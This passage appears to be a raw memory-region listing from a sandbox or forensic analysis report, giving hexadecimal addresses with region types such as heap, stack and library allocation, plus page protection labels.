page read and write
22F5F202000
trusted library allocation
page read and write
7FF783501000
unkown
page read and write
913BBFF000
stack
page read and write
1C7BD44E000
heap
page read and write
150FC770000
trusted library allocation
page read and write
24D36C32000
heap
page read and write
24D361B0000
heap
page read and write
17085190000
heap
page read and write
1F54E867000
heap
page read and write
24D35761000
heap
page read and write
1C7C0DB5000
trusted library allocation
page read and write
1E375EA4000
heap
page read and write
1E375FA0000
heap
page read and write
17085185000
heap
page read and write
17E98FE000
stack
page read and write
24D33E11000
heap
page read and write
24D33910000
heap
page read and write
170877BD000
heap
page read and write
24D35CE2000
heap
page read and write
7FF9C52C0000
trusted library allocation
page read and write
1C7D77E6000
heap
page read and write
9E2FE7D000
stack
page read and write
1E2803E2000
heap
page read and write
24D357E1000
heap
page read and write
7FF78DE32000
unkown
page readonly
24D34C12000
heap
page read and write
150FCB0A000
heap
page read and write
7FF9C59AA000
trusted library allocation
page read and write
17085180000
heap
page read and write
4D50000
heap
page read and write
24D33090000
heap
page read and write
150FBA02000
heap
page read and write
24D367B1000
heap
page read and write
16006383000
heap
page read and write
7FF9C5800000
trusted library allocation
page read and write
150FBB1A000
heap
page read and write
24D35F30000
heap
page read and write
1A4BEA19000
heap
page read and write
1C7D77CD000
heap
page read and write
24D3B781000
heap
page read and write
2C7D000
stack
page read and write
7FF9C56A0000
trusted library allocation
page read and write
AE0000
heap
page read and write
26B9E126000
heap
page read and write
53002FE000
stack
page read and write
1E280381000
heap
page read and write
11A7000
heap
page read and write
24D3B0C0000
heap
page read and write
1C7D7385000
heap
page read and write
26B0000
heap
page read and write
46E937E000
stack
page read and write
24D3BAC2000
heap
page read and write
1C7C0428000
trusted library allocation
page read and write
17085070000
heap
page read and write
24D33DD1000
heap
page read and write
1E280424000
heap
page read and write
24D34F20000
heap
page read and write
1E2805D4000
heap
page read and write
1600630C000
heap
page read and write
24D35A62000
heap
page read and write
17085082000
heap
page read and write
17083034000
heap
page read and write
1C7C0CDB000
trusted library allocation
page read and write
4D3B000
stack
page read and write
947839C000
stack
page read and write
1DEFEA48000
heap
page read and write
170851E0000
heap
page read and write
24D3AF00000
heap
page read and write
160063B2000
heap
page read and write
1708504F000
heap
page read and write
150FB313000
heap
page read and write
24D34CD2000
heap
page read and write
26B9E123000
heap
page read and write
1C7BD489000
heap
page read and write
5BF1FE000
stack
page read and write
7FF9C5360000
trusted library allocation
page read and write
24D3B2C0000
heap
page read and write
17084CC0000
trusted library allocation
page read and write
24D34F60000
heap
page read and write
1A4BEA10000
heap
page read and write
24D361F0000
heap
page read and write
6D78000
heap
page read and write
7FF9C52D0000
trusted library allocation
page read and write
31BB0FE000
stack
page read and write
7FF9C5870000
trusted library allocation
page read and write
170877CA000
heap
page read and write
24D3B4C1000
heap
page read and write
24D336D0000
heap
page read and write
1C7D83B2000
heap
page read and write
1708503C000
heap
page read and write
31BB07E000
stack
page read and write
16006301000
heap
page read and write
1F54E82B000
heap
page read and write
17083036000
heap
page read and write
1E2805D2000
heap
page read and write
1C7D75EA000
heap
page read and write
24D3B5C1000
heap
page read and write
DC8000
stack
page read and write
1A6B63D0000
trusted library allocation
page read and write
1C7BD600000
heap
page read and write
24D31BCE000
heap
page read and write
46E92FE000
unkown
page readonly
24D33C11000
heap
page read and write
24D36D32000
heap
page read and write
A245EFF000
stack
page read and write
7FF9C5B10000
trusted library allocation
page read and write
24D2E447000
heap
page read and write
24D34911000
heap
page read and write
150FC820000
trusted library allocation
page read and write
9E2F3FE000
stack
page read and write
7FF9C5984000
trusted library allocation
page read and write
7FF9C5310000
trusted library allocation
page execute and read and write
24D34611000
heap
page read and write
7FFA417C1000
unkown
page execute read
24D35B62000
heap
page read and write
16006368000
heap
page read and write
6DB417E000
stack
page read and write
7FF9C55E0000
trusted library allocation
page read and write
31BB779000
stack
page read and write
24D3B942000
heap
page read and write
2132BEF000
stack
page read and write
7FF9C5490000
trusted library allocation
page read and write
1DEFEA5A000
heap
page read and write
224C2502000
trusted library allocation
page read and write
1C7C043F000
trusted library allocation
page read and write
DDE5A7D000
stack
page read and write
6D85000
heap
page read and write
1708506E000
heap
page read and write
20874E60000
heap
page read and write
8295AFF000
stack
page read and write
46E9C7E000
stack
page read and write
24D360F0000
heap
page read and write
38017FE000
unkown
page read and write
7518000
stack
page read and write
17085172000
heap
page read and write
1E2803AA000
heap
page read and write
17084B1E000
heap
page read and write
38DF000
heap
page read and write
1708506E000
heap
page read and write
7FF9C5C20000
trusted library allocation
page read and write
150FC730000
trusted library allocation
page read and write
7FFA41950000
unkown
page read and write
150FCA1C000
heap
page read and write
1A4BE980000
heap
page read and write
2AF18BA0000
heap
page read and write
24D36030000
heap
page read and write
17085030000
heap
page read and write
24D3B881000
heap
page read and write
24D3B641000
heap
page read and write
1708505F000
heap
page read and write
24D34751000
heap
page read and write
24D3B581000
heap
page read and write
224C2450000
heap
page read and write
1C7CF64A000
trusted library allocation
page read and write
1C7D7639000
heap
page read and write
24D34350000
heap
page read and write
1E280410000
heap
page read and write
7DF4E6520000
trusted library allocation
page execute and read and write
682EC000
unkown
page readonly
7FF783491000
unkown
page execute read
16006394000
heap
page read and write
24D36BB2000
heap
page read and write
24D3B681000
heap
page read and write
1A8B8CF5000
heap
page read and write
1708302E000
heap
page read and write
17085055000
heap
page read and write
10F0000
heap
page read and write
9E3007E000
unkown
page readonly
17082FC2000
heap
page read and write
1E2803FC000
heap
page read and write
274DA357000
heap
page read and write
16006150000
heap
page read and write
24D359E2000
heap
page read and write
5BF0FE000
stack
page read and write
17085080000
heap
page read and write
24D35BA2000
heap
page read and write
7FF9C5B20000
trusted library allocation
page read and write
7DF4E6530000
trusted library allocation
page execute and read and write
9E2FD7E000
unkown
page readonly
E8167FE000
stack
page read and write
1C7BD43F000
heap
page read and write
6DB397E000
unkown
page readonly
17089642000
trusted library allocation
page read and write
1CEC1A80000
heap
page read and write
24D36330000
heap
page read and write
1708504F000
heap
page read and write
17085065000
heap
page read and write
A52277F000
stack
page read and write
7FF9C52E0000
trusted library allocation
page read and write
24D35C62000
heap
page read and write
150FCAF4000
heap
page read and write
1F54E861000
heap
page read and write
1025000
heap
page read and write
7FF9C5620000
trusted library allocation
page read and write
17082FD9000
heap
page read and write
1A8B8A47000
heap
page read and write
68296000
unkown
page read and write
1E28035C000
heap
page read and write
7FF9C5300000
trusted library allocation
page read and write
C658B7E000
unkown
page readonly
7FF9C5C60000
trusted library allocation
page read and write
1F54F000000
heap
page read and write
160062D9000
heap
page read and write
7FF9C5860000
trusted library allocation
page read and write
24D34BD2000
heap
page read and write
17085042000
heap
page read and write
24D34992000
heap
page read and write
24D34711000
heap
page read and write
2558CFE000
stack
page read and write
1C7C079F000
trusted library allocation
page read and write
1C7C0CBB000
trusted library allocation
page read and write
17085065000
heap
page read and write
1E2803E8000
heap
page read and write
7FD0000
heap
page read and write
24D33950000
heap
page read and write
2DDFFA5A000
heap
page read and write
24D33F90000
heap
page read and write
313F000
stack
page read and write
1708506E000
heap
page read and write
170851CD000
heap
page read and write
24D2E430000
heap
page read and write
1DEFEA5B000
heap
page read and write
17087768000
heap
page read and write
24D2E494000
heap
page read and write
7FF9C5240000
trusted library allocation
page read and write
7FF9C5BF0000
trusted library allocation
page read and write
64FE6FB000
stack
page read and write
24D34651000
heap
page read and write
7FF9C57E0000
trusted library allocation
page read and write
24D36471000
heap
page read and write
150FC6D0000
trusted library allocation
page read and write
1E2803FA000
heap
page read and write
160081E0000
heap
page read and write
1A6B63B0000
trusted library allocation
page read and write
1020000
heap
page read and write
150FB213000
heap
page read and write
7FF9C5690000
trusted library allocation
page read and write
1C362ED0000
heap
page read and write
1E375EA7000
heap
page read and write
17083001000
heap
page read and write
17082FFA000
heap
page read and write
1F54E80B000
heap
page read and write
24203FE000
stack
page read and write
6DB427E000
unkown
page readonly
2AF18F50000
heap
page read and write
98F247E000
stack
page read and write
150FBA00000
heap
page read and write
24D36D32000
heap
page read and write
24D34611000
heap
page read and write
170877A5000
heap
page read and write
1E2803EC000
heap
page read and write
24D31C8D000
heap
page read and write
1708504B000
heap
page read and write
24D353E1000
heap
page read and write
24D2E4BD000
heap
page read and write
1F54E7E0000
trusted library allocation
page read and write
2DDFFA5C000
heap
page read and write
1C7D75A0000
heap
page read and write
24D36CB2000
heap
page read and write
7FFA330E0000
unkown
page readonly
1FED59A4000
heap
page read and write
1708504F000
heap
page read and write
24D350A0000
heap
page read and write
24D355A1000
heap
page read and write
24D2E501000
heap
page read and write
274DA34B000
heap
page read and write
1CEC1870000
heap
page read and write
24D34D92000
heap
page read and write
24D2FDC3000
heap
page read and write
46E8FFC000
stack
page read and write
17084B10000
heap
page read and write
24D33BD1000
heap
page read and write
1E28040E000
heap
page read and write
22F5F1A0000
trusted library allocation
page read and write
2672F7A6000
heap
page read and write
1F54E839000
heap
page read and write
7FF9C5480000
trusted library allocation
page read and write
150FCB0E000
heap
page read and write
DDE5B7E000
stack
page read and write
1F54E802000
heap
page read and write
1A6B4A1F000
heap
page read and write
7FF9C52F0000
trusted library allocation
page read and write
17085180000
heap
page read and write
6DB3C7E000
unkown
page readonly
24D3B401000
heap
page read and write
7FF9C52AE000
trusted library allocation
page read and write
24D35AA2000
heap
page read and write
38A0000
heap
page read and write
24D32120000
trusted library allocation
page read and write
17E997F000
stack
page read and write
24D366F1000
heap
page read and write
24D2E4DD000
heap
page read and write
17085157000
heap
page read and write
166D5290000
heap
page read and write
660EF000
unkown
page read and write
1C7D7395000
heap
page read and write
24D35861000
heap
page read and write
2558BFF000
unkown
page read and write
24D36A72000
heap
page read and write
24D35F70000
heap
page read and write
64950000
unkown
page read and write
7FF9C5A34000
trusted library allocation
page read and write
17083019000
heap
page read and write
1708517A000
heap
page read and write
1E28037C000
heap
page read and write
9E2F9FE000
stack
page read and write
7FF9C53A0000
trusted library allocation
page read and write
B5B000
heap
page read and write
7FF9C5A40000
trusted library allocation
page read and write
7FFA24188000
unkown
page execute read
24D36130000
heap
page read and write
7FFA417C0000
unkown
page readonly
6DB3F7E000
stack
page read and write
24D33710000
heap
page read and write
150FBB02000
heap
page read and write
7FF9C5030000
trusted library allocation
page read and write
7FF0000
heap
page read and write
1C7BD510000
trusted library section
page read and write
46EA9FE000
unkown
page readonly
17085076000
heap
page read and write
7FF9C5980000
trusted library allocation
page read and write
170851E4000
heap
page read and write
170851E9000
heap
page read and write
224C2458000
heap
page read and write
22F5EA10000
heap
page read and write
E81687E000
unkown
page readonly
31BB17F000
stack
page read and write
64FE7FE000
unkown
page read and write
1E280382000
heap
page read and write
7FF9C5820000
trusted library allocation
page read and write
1708503E000
heap
page read and write
1E28036C000
heap
page read and write
1E280424000
heap
page read and write
24D34EE0000
heap
page read and write
1FED598D000
heap
page read and write
46EA3FE000
unkown
page readonly
E81657E000
unkown
page readonly
57EB1FF000
stack
page read and write
17085060000
heap
page read and write
1ADD0A70000
heap
page read and write
24D34951000
heap
page read and write
17084B1E000
heap
page read and write
24D3B841000
heap
page read and write
BBF000
heap
page read and write
9E2F47E000
stack
page readonly
1DEFEA4D000
heap
page read and write
1C7C0683000
trusted library allocation
page read and write
1E2803F2000
heap
page read and write
24D35EB0000
heap
page read and write
1455000
heap
page read and write
17083006000
heap
page read and write
1708507E000
heap
page read and write
64D1000
heap
page read and write
1E280374000
heap
page read and write
17085155000
heap
page read and write
7FF9C5470000
trusted library allocation
page read and write
1C362E30000
heap
page read and write
2BF4000
stack
page read and write
6484000
heap
page read and write
2420BFB000
stack
page read and write
1E2803A0000
heap
page read and write
20874E90000
heap
page read and write
150FD000000
heap
page read and write
1E2803BB000
heap
page read and write
A245E7E000
stack
page read and write
150FC820000
trusted library allocation
page read and write
E816C7E000
stack
page read and write
24D3B2B8000
heap
page read and write
1E2802B0000
heap
page read and write
24D34190000
heap
page read and write
913B8FB000
stack
page read and write
7FF9C51D0000
trusted library allocation
page read and write
24D321DC000
heap
page read and write
2DDFFA46000
heap
page read and write
1708506E000
heap
page read and write
7FF9C5340000
trusted library allocation
page execute and read and write
7FF9C5A03000
trusted library allocation
page read and write
7FF9C5750000
trusted library allocation
page execute and read and write
53005FE000
stack
page read and write
17085077000
heap
page read and write
7FF9C54A0000
trusted library allocation
page read and write
1E2803EC000
heap
page read and write
7FF9C57D0000
trusted library allocation
page read and write
16007BA0000
heap
page read and write
26B9E275000
heap
page read and write
24D34A12000
heap
page read and write
1E2803ED000
heap
page read and write
24D3B3C1000
heap
page read and write
DDE5EFD000
stack
page read and write
17085047000
heap
page read and write
1C7BD590000
trusted library allocation
page read and write
24D365B1000
heap
page read and write
7FFA4194F000
unkown
page write copy
150FBB00000
heap
page read and write
1E2803F4000
heap
page read and write
24D3BA02000
heap
page read and write
17085065000
heap
page read and write
24D32E50000
heap
page read and write
1600635A000
heap
page read and write
170851E4000
heap
page read and write
1E2803EC000
heap
page read and write
17084B15000
heap
page read and write
66001000
unkown
page execute read
1E2805B4000
heap
page read and write
24D358A1000
heap
page read and write
1C362E10000
heap
page read and write
24D34491000
heap
page read and write
24D35FB0000
heap
page read and write
1C7D836B000
heap
page read and write
17085079000
heap
page read and write
24D3B080000
heap
page read and write
7FF9C5CA0000
trusted library allocation
page read and write
7FF9C55A0000
trusted library allocation
page read and write
46E835B000
stack
page read and write
1708302C000
heap
page read and write
5BF5FB000
stack
page read and write
17084CD0000
heap
page read and write
1C7C1102000
trusted library allocation
page read and write
17E95FC000
stack
page read and write
2F80000
heap
page read and write
1F54E800000
heap
page read and write
16006308000
heap
page read and write
7FF9C5670000
trusted library allocation
page read and write
150FCB02000
heap
page read and write
2AF18B40000
heap
page read and write
1E2803EC000
heap
page read and write
12DE000
stack
page read and write
16006396000
heap
page read and write
150FC6C0000
trusted library allocation
page read and write
166D5270000
heap
page read and write
DBE000
stack
page read and write
11C2000
heap
page read and write
1708507A000
heap
page read and write
7FF9C5290000
trusted library allocation
page read and write
7FFA41954000
unkown
page readonly
1DEFEA4F000
heap
page read and write
17082FD7000
heap
page read and write
7FF9C5580000
trusted library allocation
page read and write
1F54E902000
heap
page read and write
1E280375000
heap
page read and write
1E2804F0000
heap
page read and write
170851BC000
heap
page read and write
24D2FDC0000
heap
page read and write
17085082000
heap
page read and write
24D33990000
heap
page read and write
24D3AD80000
heap
page read and write
1CB996E0000
heap
page read and write
1ADD07D0000
heap
page read and write
31BB6FE000
stack
page read and write
24D346D1000
heap
page read and write
1708507E000
heap
page read and write
7FF9C504D000
trusted library allocation
page execute and read and write
170851C5000
heap
page read and write
6C8F000
heap
page read and write
150FC750000
trusted library allocation
page read and write
46E9CFE000
unkown
page readonly
24D353A1000
heap
page read and write
1C7BF1F4000
heap
page read and write
7FF9C5640000
trusted library allocation
page read and write
7FF9C5570000
trusted library allocation
page read and write
6D7E000
heap
page read and write
1F54E865000
heap
page read and write
1DEFEA73000
heap
page read and write
7FF9C507C000
trusted library allocation
page execute and read and write
11A0000
heap
page read and write
16006348000
heap
page read and write
31BB4FA000
stack
page read and write
274DA510000
heap
page read and write
170851FB000
heap
page read and write
24D35B62000
heap
page read and write
7173000
heap
page read and write
6EBD000
stack
page read and write
1708504F000
heap
page read and write
16006329000
heap
page read and write
1C7C05B7000
trusted library allocation
page read and write
1600634A000
heap
page read and write
150FC782000
trusted library allocation
page read and write
E40000
heap
page read and write
7FF9C5B40000
trusted library allocation
page read and write
24D33FD0000
heap
page read and write
24D340D0000
heap
page read and write
9E3027E000
unkown
page readonly
7FF9C54C0000
trusted library allocation
page read and write
1708506E000
heap
page read and write
1708779B000
heap
page read and write
7FFA244A6000
unkown
page write copy
E816A7E000
stack
page read and write
17082FFD000
heap
page read and write
64941000
unkown
page execute read
24D34150000
heap
page read and write
1A6B4A4C000
heap
page read and write
17083012000
heap
page read and write
1E280523000
heap
page read and write
1E280554000
heap
page read and write
24D363B1000
heap
page read and write
1E28037C000
heap
page read and write
1DEFEAA4000
heap
page read and write
160063B4000
heap
page read and write
7FF9C5380000
trusted library allocation
page read and write
24D33A10000
heap
page read and write
70B4000
heap
page read and write
1E2803BF000
heap
page read and write
170851B6000
heap
page read and write
160062B0000
heap
page read and write
7FF9C5455000
trusted library allocation
page read and write
170877A4000
heap
page read and write
1DEFEA62000
heap
page read and write
1708507D000
heap
page read and write
17085065000
heap
page read and write
1DEFEA61000
heap
page read and write
16006376000
heap
page read and write
7FF9C5710000
trusted library allocation
page read and write
7FF9C5680000
trusted library allocation
page read and write
1708507A000
heap
page read and write
1E2803B5000
heap
page read and write
B90000
heap
page read and write
24D36871000
heap
page read and write
24D3B6C1000
heap
page read and write
1C7BD444000
heap
page read and write
1708504B000
heap
page read and write
188AEF70000
heap
page read and write
24D36631000
heap
page read and write
46E93FE000
unkown
page readonly
17083038000
heap
page read and write
1600635E000
heap
page read and write
1160000
heap
page read and write
24D34C52000
heap
page read and write
1C7D7389000
heap
page read and write
660F5000
unkown
page readonly
17085086000
heap
page read and write
1E2803FC000
heap
page read and write
7FF9C5450000
trusted library allocation
page read and write
1708506E000
heap
page read and write
6DB3D7E000
stack
page read and write
7FF9C57F0000
trusted library allocation
page read and write
24D3B3C1000
heap
page read and write
224C23F0000
heap
page read and write
1708507B000
heap
page read and write
1C7CF391000
trusted library allocation
page read and write
24D35621000
heap
page read and write
1C7C0539000
trusted library allocation
page read and write
1C7BD5D0000
trusted library allocation
page read and write
1C7C0809000
trusted library allocation
page read and write
1E2803F8000
heap
page read and write
24D36070000
heap
page read and write
E81647E000
stack
page read and write
24D2E46F000
heap
page read and write
170877C0000
heap
page read and write
1C7C0341000
trusted library allocation
page read and write
17085080000
heap
page read and write
660F4000
unkown
page write copy
17085046000
heap
page read and write
1C7D7742000
heap
page read and write
3B6DFE000
stack
page read and write
1C362E00000
heap
page read and write
24D35921000
heap
page read and write
24D32E90000
heap
page read and write
7FF9C5993000
trusted library allocation
page read and write
7FF9C5432000
trusted library allocation
page read and write
24D33850000
heap
page read and write
1708504F000
heap
page read and write
1708519F000
heap
page read and write
1C7BD48D000
heap
page read and write
150FCB1A000
heap
page read and write
1E375DA0000
heap
page read and write
24D36371000
heap
page read and write
24D356E1000
heap
page read and write
6494A000
unkown
page readonly
46E99FD000
stack
page read and write
1C7BD44A000
heap
page read and write
1AC57C000
stack
page read and write
1708506A000
heap
page read and write
24D364F1000
heap
page read and write
17085074000
heap
page read and write
24D330D0000
heap
page read and write
682A0000
unkown
page readonly
E88EBFE000
stack
page read and write
2672F78B000
heap
page read and write
2672F7A4000
heap
page read and write
7FF783501000
unkown
page write copy
E816E7B000
stack
page read and write
7FF9C5840000
trusted library allocation
page read and write
1C7BD3A0000
heap
page read and write
7FF9C56E0000
trusted library allocation
page read and write
1E280392000
heap
page read and write
1708300A000
heap
page read and write
98F287E000
stack
page read and write
150FC8F0000
remote allocation
page read and write
1E2803A0000
heap
page read and write
150FBB13000
heap
page read and write
17082FC7000
heap
page read and write
1A6B4A24000
heap
page read and write
17083007000
heap
page read and write
24D33B90000
heap
page read and write
16006300000
heap
page read and write
1A6B4A00000
heap
page read and write
7FF9C5B30000
trusted library allocation
page read and write
1E2805D2000
heap
page read and write
7FF9C5B00000
trusted library allocation
page execute and read and write
17083007000
heap
page read and write
53004FD000
stack
page read and write
24D2E4CA000
heap
page read and write
17085072000
heap
page read and write
9E3017D000
stack
page read and write
2420AFF000
stack
page read and write
17085071000
heap
page read and write
7FF783490000
unkown
page readonly
1DEFEA81000
heap
page read and write
E816D7E000
unkown
page readonly
98F19BB000
stack
page read and write
712A000
heap
page read and write
24D36571000
heap
page read and write
2DDFFA3F000
heap
page read and write
7FF9C56F0000
trusted library allocation
page read and write
1A4BE9A0000
heap
page read and write
24D31CB6000
heap
page read and write
24D362B0000
heap
page read and write
9E2F87E000
stack
page read and write
1C7BF310000
heap
page execute and read and write
24D3B681000
heap
page read and write
11C0000
heap
page read and write
2AF18B10000
heap
page read and write
7FFA2CF18000
unkown
page readonly
17087760000
heap
page read and write
24D34010000
heap
page read and write
98F2076000
stack
page read and write
24D355E1000
heap
page read and write
7FF9C5A70000
trusted library allocation
page read and write
166D5295000
heap
page read and write
1E2803BF000
heap
page read and write
2DDFF990000
heap
page read and write
7FF9C5263000
trusted library allocation
page read and write
A98000
stack
page read and write
31BADBE000
stack
page read and write
24D3AFC0000
heap
page read and write
7FF9C5810000
trusted library allocation
page read and write
1E280403000
heap
page read and write
7FFA24061000
unkown
page execute read
150FCB15000
heap
page read and write
1E2803AC000
heap
page read and write
1E2803D7000
heap
page read and write
46EA0FE000
stack
page read and write
65F0000
heap
page read and write
7FF9C5740000
trusted library allocation
page read and write
1A6B4900000
heap
page read and write
1C7BF588000
trusted library allocation
page read and write
150FB22B000
heap
page read and write
24D36170000
heap
page read and write
24D2E4E7000
heap
page read and write
9E2FFFE000
stack
page read and write
17083150000
heap
page read and write
1708508B000
heap
page read and write
7FF9C59A0000
trusted library allocation
page read and write
1C7CF3C5000
trusted library allocation
page read and write
1C7C0585000
trusted library allocation
page read and write
7FF9C5940000
trusted library allocation
page read and write
1DEFEA60000
heap
page read and write
1708504C000
heap
page read and write
1708504F000
heap
page read and write
24209FE000
stack
page read and write
2DD800D0000
trusted library allocation
page read and write
24D352A0000
heap
page read and write
17085088000
heap
page read and write
24D369B2000
heap
page read and write
1E2803E8000
heap
page read and write
6770000
heap
page read and write
1C7BF160000
heap
page execute and read and write
1C7C0D89000
trusted library allocation
page read and write
224C2402000
unkown
page read and write
150FB22F000
heap
page read and write
1E2803B5000
heap
page read and write
98F277E000
unkown
page readonly
24D33AD0000
heap
page read and write
1708507F000
heap
page read and write
188B0A15000
heap
page read and write
E60000
heap
page read and write
E815ABB000
stack
page read and write
46E8EFE000
unkown
page readonly
150FB1E0000
trusted library section
page read and write
1DEFEA00000
heap
page read and write
24D3B942000
heap
page read and write
24D33B10000
heap
page read and write
150FCAE1000
heap
page read and write
1E375E8B000
heap
page read and write
6DB3BFE000
stack
page read and write
224C2DA0000
heap
page readonly
7057000
heap
page read and write
7FF9C5970000
trusted library allocation
page read and write
24D3B381000
heap
page read and write
24D33B50000
heap
page read and write
24D351A0000
heap
page read and write
24D365F1000
heap
page read and write
16006308000
heap
page read and write
26B9DFD0000
heap
page read and write
24D3B741000
heap
page read and write
6CEC000
heap
page read and write
24D34D12000
heap
page read and write
24D3B180000
heap
page read and write
24D368B1000
heap
page read and write
D3D000
stack
page read and write
A5226FE000
stack
page read and write
7FF9C5040000
trusted library allocation
page read and write
17085180000
heap
page read and write
17085047000
heap
page read and write
BB6000
heap
page read and write
1708778F000
heap
page read and write
24D3B741000
heap
page read and write
1C7BF361000
trusted library allocation
page read and write
17085065000
heap
page read and write
7FF783505000
unkown
page readonly
2672F9A0000
heap
page read and write
1708506E000
heap
page read and write
24D35160000
heap
page read and write
57EAD6C000
stack
page read and write
24D3B0C0000
heap
page read and write
24D3B441000
heap
page read and write
150FCAA5000
heap
page read and write
1708301C000
heap
page read and write
24D3B200000
heap
page read and write
24D35120000
heap
page read and write
1C7D7414000
heap
page read and write
7FF78DE31000
unkown
page execute read
46E957E000
stack
page read and write
24D354A1000
heap
page read and write
24D351E0000
heap
page read and write
7FF9C54E7000
trusted library allocation
page read and write
7FF9C5880000
trusted library allocation
page read and write
1A8B8A40000
heap
page read and write
24D2FF00000
heap
page read and write
170877A1000
heap
page read and write
24D33710000
heap
page read and write
17085042000
heap
page read and write
31BB1F9000
stack
page read and write
1708505F000
heap
page read and write
1C7BD3E0000
heap
page read and write
1E2803C3000
heap
page read and write
150FB329000
heap
page read and write
7FF9C5106000
trusted library allocation
page execute and read and write
1E2803A9000
heap
page read and write
EC312FF000
stack
page read and write
1F54E84E000
heap
page read and write
6C95000
heap
page read and write
16006250000
heap
page read and write
24D33A50000
heap
page read and write
17082F60000
heap
page read and write
31BB3F7000
stack
page read and write
7FF9C5C70000
trusted library allocation
page read and write
1C7CF659000
trusted library allocation
page read and write
24D34A52000
heap
page read and write
7FF9C59B0000
trusted library allocation
page read and write
17085087000
heap
page read and write
16006383000
heap
page read and write
6601E000
unkown
page readonly
1708508E000
heap
page read and write
1C7BF3E7000
trusted library allocation
page read and write
24D34751000
heap
page read and write
24D35421000
heap
page read and write
1C362EF3000
heap
page read and write
1E280424000
heap
page read and write
24D2FF71000
heap
page read and write
1708303D000
heap
page read and write
17085083000
heap
page read and write
6DB38FE000
stack
page read and write
17085065000
heap
page read and write
24D339D0000
heap
page read and write
24D34FE0000
heap
page read and write
1E280522000
heap
page read and write
17085055000
heap
page read and write
24D3B501000
heap
page read and write
1A6B49E0000
heap
page read and write
7FFA33164000
unkown
page read and write
53001FD000
stack
page read and write
38016FC000
stack
page read and write
24D34FE0000
heap
page read and write
6490000
heap
page read and write
1C7C00E9000
trusted library allocation
page read and write
1C7D75F2000
heap
page read and write
24D369B2000
heap
page read and write
170851AD000
heap
page read and write
17083000000
heap
page read and write
17085073000
heap
page read and write
150FB200000
heap
page read and write
7FF9C5C00000
trusted library allocation
page read and write
7FF9C5037000
trusted library allocation
page read and write
274DA2A0000
heap
page read and write
24D36D32000
heap
page read and write
24D3B781000
heap
page read and write
7FF9C5590000
trusted library allocation
page read and write
1E280420000
heap
page read and write
24D3B381000
heap
page read and write
1123A7E000
stack
page read and write
24D3B902000
heap
page read and write
24D36531000
heap
page read and write
1C7D7674000
heap
page read and write
17085060000
heap
page read and write
1ADD07F0000
heap
page read and write
1AC77C000
stack
page read and write
3B6CFE000
stack
page read and write
24D35A22000
heap
page read and write
17083029000
heap
page read and write
7FF9C58A0000
trusted library allocation
page read and write
6C00000
heap
page read and write
31BB27E000
stack
page read and write
17085065000
heap
page read and write
20874EF6000
heap
page read and write
24D3B240000
heap
page read and write
1E2803FC000
heap
page read and write
1CEC1B00000
heap
page read and write
1708505F000
heap
page read and write
24D2E489000
heap
page read and write
1F54E841000
heap
page read and write
24D33050000
heap
page read and write
24D330D0000
heap
page read and write
17085074000
heap
page read and write
E3E000
stack
page read and write
24D35721000
heap
page read and write
170851A5000
heap
page read and write
1708776B000
heap
page read and write
1CB99910000
heap
page read and write
31BB67E000
stack
page read and write
1E2803DF000
heap
page read and write
22F5EC16000
heap
page read and write
7FF9C5A48000
trusted library allocation
page read and write
46E9DFE000
stack
page read and write
24D34891000
heap
page read and write
1C7BFFBF000
trusted library allocation
page read and write
1DEFEA41000
heap
page read and write
1708503C000
heap
page read and write
150FC790000
trusted library allocation
page read and write
24D2E464000
heap
page read and write
1E375E80000
heap
page read and write
1FED5810000
heap
page read and write
1E28041C000
heap
page read and write
1E280396000
heap
page read and write
1F54E6D0000
heap
page read and write
38018FE000
stack
page read and write
2DDFFA00000
heap
page read and write
24D34110000
heap
page read and write
1DEFEA25000
heap
page read and write
1C7C053E000
trusted library allocation
page read and write
1ADD06F0000
heap
page read and write
7FF9C5AD0000
trusted library allocation
page read and write
7FFA2CF3E000
unkown
page read and write
224C245B000
heap
page read and write
24D36C72000
heap
page read and write
7FFA2CEE0000
unkown
page read and write
7FF9C55D0000
trusted library allocation
page read and write
16006230000
heap
page read and write
24D2E479000
heap
page read and write
1A4BEA1C000
heap
page read and write
DDE5FFE000
stack
page read and write
150FB302000
heap
page read and write
24D35DB0000
heap
page read and write
150FB23F000
heap
page read and write
24D33C91000
heap
page read and write
24D367F1000
heap
page read and write
24D34451000
heap
page read and write
24D3BA42000
heap
page read and write
C65879D000
stack
page read and write
20874E70000
heap
page read and write
24D34290000
heap
page read and write
1DEFEA65000
heap
page read and write
31BC1C9000
stack
page read and write
2672F9A5000
heap
page read and write
24D36431000
heap
page read and write
1E280386000
heap
page read and write
1C7D75CE000
heap
page read and write
24D2E46B000
heap
page read and write
1600638A000
heap
page read and write
1E375FF5000
heap
page read and write
24D3AE80000
heap
page read and write
1DEFE9A0000
heap
page read and write
1E280417000
heap
page read and write
1CB99A20000
heap
page read and write
2DDFFB02000
heap
page read and write
46E89F7000
stack
page read and write
1C7BF1E0000
heap
page read and write
24D369B3000
heap
page read and write
24D2E4B9000
heap
page read and write
1C7BD2A0000
heap
page read and write
1708506E000
heap
page read and write
1708504B000
heap
page read and write
17085074000
heap
page read and write
24D360B0000
heap
page read and write
24D35521000
heap
page read and write
7FFA243AB000
unkown
page readonly
24D33C51000
heap
page read and write
208750A0000
heap
page read and write
7FF9C5A30000
trusted library allocation
page read and write
24D351E0000
heap
page read and write
7FF9C5C30000
trusted library allocation
page read and write
1E2803A8000
heap
page read and write
24D34811000
heap
page read and write
7FF9C59E0000
trusted library allocation
page read and write
150FCB00000
heap
page read and write
31BB5FE000
stack
page read and write
17082FDC000
heap
page read and write
7FF9C5452000
trusted library allocation
page read and write
E8168FE000
stack
page read and write
1C7BD520000
trusted library allocation
page read and write
B04000
heap
page read and write
17085061000
heap
page read and write
1600637B000
heap
page read and write
7FF9C54D0000
trusted library allocation
page read and write
188B0A10000
heap
page read and write
24D3B1C0000
heap
page read and write
2DDFFA13000
heap
page read and write
24D3B801000
heap
page read and write
24D2E51C000
heap
page read and write
1C7C0EAF000
trusted library allocation
page read and write
24D34C12000
heap
page read and write
64C8000
heap
page read and write
1E2805D2000
heap
page read and write
1CB998E0000
heap
page read and write
17085086000
heap
page read and write
46E9E7E000
stack
page read and write
7FF9C59C0000
trusted library allocation
page read and write
9E2F77E000
unkown
page readonly
1C7BD605000
heap
page read and write
1DEFEA4C000
heap
page read and write
1C7BD400000
heap
page read and write
1E2803E3000
heap
page read and write
68280000
unkown
page readonly
16006352000
heap
page read and write
17085072000
heap
page read and write
1A6B4A40000
heap
page read and write
24D3AEC0000
heap
page read and write
24D34310000
heap
page read and write
17089F60000
heap
page readonly
17083033000
heap
page read and write
2B79000
stack
page read and write
1DEFEA13000
heap
page read and write
7FFA41891000
unkown
page readonly
1708505A000
heap
page read and write
